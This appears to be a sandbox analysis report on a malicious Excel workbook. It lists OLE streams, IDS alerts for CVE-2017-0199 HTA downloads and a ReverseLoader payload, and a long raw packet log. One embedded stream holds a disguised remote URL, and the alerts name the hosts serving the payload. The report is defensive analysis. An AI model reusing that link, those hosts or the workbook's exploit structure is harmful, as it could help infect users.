                                                  Entropy:4.086306928392587
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:134792
                                                  Entropy:7.974168320310173
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:468
                                                  Entropy:5.269289820125323
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:83
                                                  Entropy:3.0672749060249043
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2486
                                                  Entropy:3.9244127831265385
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:536
                                                  Entropy:6.330646364694152
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD00726B69/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.219515110876372
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD00726B69/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26242
                                                  Entropy:7.635424485665502
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:283872
                                                  Entropy:7.743278150467805
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DC/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:900
                                                  Entropy:4.690868210226044
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . c . . I . . . . . . . . . . . . & . . . y . . . K . " . . . h . t . t . p . s . : . / . / . l . i . n . k . j . a . g . o . . . m . e . / . R . H . C . Y . X . p . ? . & . d . a . m . a . g . e . = . n . a . s . t . y . . & . b . r . i . e . f . s . = . m . o . m . e . n . t . o . u . s . & . h . i . g . h . l . i . g . h . t . = . d . e . l . i . c . i . o . u . s . & . m . i . d . d . l . e . m . a . n . = . m . a . g . e . n . t . a . & . s . p . a . n . k . . . E ( . A + C . . . F . . T 5 i !
                                                  General
                                                  Stream Path:Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:291629
                                                  Entropy:7.998497664529042
                                                  Base64 Encoded:True
                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                  2024-12-02T07:24:37.155643+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49162 | 146.70.113.200 | 80 | TCP
                                                  2024-12-02T07:24:37.155691+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 146.70.113.200 | 80 | 192.168.2.22 | 49162 | TCP
                                                  2024-12-02T07:24:42.088643+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 146.70.113.200 | 80 | TCP
                                                  2024-12-02T07:24:42.088685+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 146.70.113.200 | 80 | 192.168.2.22 | 49164 | TCP
                                                  2024-12-02T07:24:49.307750+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49165 | 146.70.113.200 | 80 | TCP
                                                  2024-12-02T07:25:02.943212+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.215.209.77 | 443 | 192.168.2.22 | 49167 | TCP
                                                  2024-12-02T07:25:03.187164+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49171 | 146.70.113.200 | 80 | TCP
                                                  2024-12-02T07:25:21.057960+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.215.209.77 | 443 | 192.168.2.22 | 49172 | TCP
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Dec 2, 2024 07:24:42.365648031 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.365747929 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.366309881 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.374082088 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.374228001 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.374286890 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.382522106 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.382599115 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.382663965 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.390897989 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.390945911 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.512221098 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.512413025 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.512486935 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.515168905 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.517123938 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.533299923 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.533528090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.533588886 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.536262035 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.536317110 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.536350012 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.537101984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.540844917 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.540986061 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.541040897 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.546840906 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.546911955 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.546961069 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.552762985 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.552891016 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.552942991 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.558696032 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.558789015 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.558845043 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.564795017 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.564934969 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.564989090 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.570561886 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.570638895 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.570692062 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.576478958 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.576596975 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.576642990 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.582443953 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.582520962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.582577944 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.588325977 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.588362932 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.588439941 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.589099884 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.594274044 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.594377995 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.594428062 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.600207090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.600370884 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.600424051 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.632447958 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.632507086 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.632600069 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.633106947 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.636442900 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.756479025 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.756536007 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.756535053 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.756587029 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.757864952 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.757913113 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.757973909 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.758018970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.760829926 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.760874033 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.760945082 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.760987997 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.763811111 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.763856888 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.763969898 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.764017105 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.766585112 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.766637087 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.767798901 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.767858028 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.767999887 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.768047094 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.770710945 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.770756960 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.770865917 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.770908117 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.773616076 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.773669958 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.773736000 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.773777008 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.776551008 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.776601076 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.776628017 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.776662111 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.779443979 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.779553890 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.779557943 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.779587984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.782416105 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.782435894 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.782463074 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.782485962 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.785429955 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.785442114 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.785531044 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.788223028 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.788265944 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.788305044 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.788336039 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.791078091 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.791126966 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.791194916 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.791244984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.793972015 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.794015884 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.794101000 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.794142008 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.796947956 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.797005892 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.797077894 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.797117949 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.799813986 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.799860954 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.799918890 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.799956083 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.802737951 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.802786112 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.802840948 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.802881002 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.805690050 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.805737019 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.805850983 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.805891037 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.808566093 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.808621883 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.808669090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.808701038 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.811558962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.811599970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.811629057 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.811659098 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.814405918 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.814455032 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.814846992 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.814892054 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.817346096 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.817388058 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.817416906 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.817455053 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.820261002 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.820306063 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.820477009 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.820538044 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.823112965 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.823156118 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.823184967 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.823236942 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.825989962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.826030970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.826127052 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.826165915 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.828917980 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.828963041 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.829025984 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.829058886 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.876728058 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.876740932 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.876789093 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.878051043 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.878098011 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.878144026 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.878195047 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.880978107 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.881026983 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.881097078 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.881139040 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.883913994 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.883970976 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.883996010 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.884038925 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:46.618942976 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.611013889 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.731082916 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:47.731190920 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.731422901 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.851411104 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307605982 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307630062 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307641029 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307749987 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307806969 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307826042 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307836056 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307847977 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307852030 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307871103 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307887077 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308017969 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308048964 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308059931 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308063030 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308088064 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308098078 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.310390949 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.427865028 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.427898884 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.427936077 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.427937031 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.530177116 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.530275106 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.530291080 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.530318975 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.534389019 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.534451962 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.534476995 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.534487963 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.542773008 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.542825937 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.542843103 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.542907000 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551119089 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.551198006 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551294088 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.551348925 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551350117 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.559580088 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.559637070 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.559654951 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.559693098 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.567954063 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.568008900 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.568021059 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.568057060 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.576385975 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.576443911 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.576452971 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:59.570343971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.570353031 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.570455074 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.570466995 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581660986 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581671000 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581780910 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.581789970 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.582981110 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.696592093 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.696603060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.696739912 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.696752071 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705445051 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705459118 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705563068 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.705574036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716330051 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716340065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716445923 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.716455936 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.721421003 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.724549055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.724556923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.724654913 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.724661112 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732697964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732736111 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732786894 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.732795000 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732845068 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.743459940 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.743469954 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.743617058 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.743624926 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.751611948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.751677990 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.751684904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.762365103 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.762444019 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.762449980 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770495892 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770536900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770570993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.770581961 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770629883 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.779944897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.779954910 CET44349167142.215.209.77192.168.2.22
